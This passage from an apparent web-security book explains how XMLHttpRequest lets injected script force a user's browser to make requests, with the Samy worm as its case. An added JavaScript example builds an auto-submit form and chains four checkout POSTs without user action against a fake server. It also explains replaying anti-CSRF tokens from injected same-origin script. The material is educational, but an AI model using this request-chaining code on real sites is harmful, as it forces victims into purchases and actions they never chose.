com; or simply common mail applications such as Yahoo!, Google, or Hotmail are all
cases where XHR GETs or POSTs could affect thousands of users within one domain. For
example, the Samy worm was able to perform XMLHTTP POSTs on MySpace by calling the
URL with the www prefix (www.myspace.com + [name of MySpace user]).
Some of you might be saying that any JavaScript could perform similar exploits, so
what is the big deal about XHR? The fact that XHR can automatically (and easily) perform
GETs and POSTs without the user's participation is key. For example, using XHR to
POST is far simpler because the attacker can simply send the data. With plain JavaScript,
the attacker would have to build a form with all the correct values in an iframe and then
submit that form. For an attack to be a full-blown virus or worm, it must be able to propagate
by itself, with limited or no user interaction. For example, XHR can issue many
HTTP GETs or POSTs automatically, forcing a user to perform many functions asynchronously.
Or a malicious XHR function could force a user to purchase an item just by viewing
a simple web forum posting about the product. While the web application requires multiple
verification steps, including add-to-cart, buy, confirm, and then purchase, XHR can
automate the POSTs behind the scenes.
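The contrast drawn in this paragraph, shown as an added example (this is not code from the book): a plain-JavaScript attacker has to assemble a hidden form and submit it, whereas an XHR caller posts the data directly and can feed one response into the next request. The checkout endpoints (/cart/add, /cart/buy, /cart/confirm, /cart/purchase) are named after the steps in the text but are hypothetical, the order-id response format is invented, and the in-memory FakeXHR class stands in for a server so the chain can run offline; in a real page you would pass window.XMLHttpRequest instead.

```javascript
// Added example, not from the book. Endpoints, response format and FakeXHR are
// constructed for illustration only.

// 1. Pre-XHR approach: build a hidden form and auto-submit it from an iframe.
//    Returns the markup as a string so it can be inspected without a browser.
function buildAutoSubmitForm(action, fields) {
  const esc = (s) => String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
  const inputs = Object.entries(fields)
    .map(([k, v]) => `<input type="hidden" name="${esc(k)}" value="${esc(v)}">`)
    .join('');
  return `<form id="f" method="POST" action="${esc(action)}">${inputs}</form>` +
         `<script>document.getElementById("f").submit();</script>`;
}

// 2. XHR approach: one call sends the POST directly; the browser attaches the
//    victim's cookies for a same-origin URL. The XHR constructor is injected so
//    the same logic runs in a page (window.XMLHttpRequest) or against a fake.
function xhrPost(XHR, url, fields) {
  return new Promise((resolve, reject) => {
    const body = new URLSearchParams(fields).toString();
    const req = new XHR();
    req.open('POST', url, true);
    req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    req.onload = () => resolve({ status: req.status, body: req.responseText });
    req.onerror = () => reject(new Error('network error'));
    req.send(body);
  });
}

// 3. Chaining: the four checkout steps from the text are posted in order with
//    no user action. A value from one response (here a hypothetical order id)
//    feeds the next request; the chain stops at the first non-2xx response.
async function automateCheckout(XHR, itemId) {
  const log = [];
  let orderId = null;
  const steps = [
    ['/cart/add',      () => ({ item: itemId, qty: 1 })],
    ['/cart/buy',      () => ({})],
    ['/cart/confirm',  () => ({ order: orderId })],
    ['/cart/purchase', () => ({ order: orderId })],
  ];
  for (const [url, fields] of steps) {
    const res = await xhrPost(XHR, url, fields());
    log.push([url, res.status]);
    if (res.status < 200 || res.status >= 300) break;
    const m = /order=(\w+)/.exec(res.body);
    if (m) orderId = m[1];
  }
  const completed = log.length === steps.length && log.every(([, s]) => s < 300);
  return { completed, log, orderId };
}

// Constructed stand-in for a shop server, exposed through the XMLHttpRequest
// surface xhrPost uses. It enforces step order: confirm/purchase need the order
// id that /cart/buy handed out, and buy needs a non-empty cart.
function makeFakeXHR() {
  const state = { cart: [], order: null, purchased: false };
  return class FakeXHR {
    open(method, url) { this.method = method; this.url = url; }
    setRequestHeader() {}
    send(body) {
      const params = Object.fromEntries(new URLSearchParams(body));
      let status = 200, text = 'ok';
      if (this.url === '/cart/add') {
        state.cart.push(params.item);
      } else if (this.url === '/cart/buy') {
        if (!state.cart.length) status = 400;
        else { state.order = 'A1'; text = 'order=A1'; }
      } else if (this.url === '/cart/confirm') {
        if (params.order !== state.order) status = 403;
      } else if (this.url === '/cart/purchase') {
        if (params.order !== state.order) status = 403;
        else state.purchased = true;
      } else {
        status = 404;
      }
      this.status = status;
      this.responseText = text;
      if (this.onload) this.onload();
    }
    static get state() { return state; }
  };
}
```

The form-based route needs a DOM, an iframe, and a submit per step, and each submit navigates the frame, so chaining four steps means waiting on four page loads. The XHR route is a handful of calls and the chain runs in the background while the victim reads the forum post. The usual caveat applies: a per-request anti-CSRF token stops this only when the script is running from another origin; script injected into the application's own origin, as in the Samy case, can read the token from the page and replay it, so the check that matters there is stopping the injection.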